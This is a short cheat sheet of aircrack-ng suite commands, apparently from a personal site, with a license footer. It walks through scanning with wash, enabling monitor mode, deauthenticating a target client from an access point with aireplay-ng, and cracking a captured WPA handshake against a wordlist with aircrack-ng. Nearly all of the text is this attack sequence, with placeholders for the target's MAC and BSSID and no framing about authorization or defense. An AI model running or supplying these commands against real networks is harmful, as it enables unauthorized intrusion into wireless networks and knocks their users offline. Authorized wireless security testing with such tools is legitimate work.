wash -i [INTERFACE]
airmon-ng check kill
airmon-ng start [INTERFACE]
airoscript-ng
De-authenticate and desassociate a client.
aireplay-ng --deauth 25 -h [TARGET MAC] -b [AP MAC] [INTERFACE]
aircrack-ng 'wireless-data-01.cap'
aircrack-ng -a2 -b [TARGET BSSID] -w dictionary.txt 'wireless-data-01.cap'
-a: Technique used to crack the handshake. 2=WPA technique.
-b: BSSID of the target router.
-w: Wordlist.
© 2023 javierizquierdovera.com
Licensed under the Apache License, Version 2.0 (LICENSE-APACHE
) or the MIT license (LICENSE-MIT
), at your option.
SPDX-License-Identifier: (Apache-2.0 OR MIT)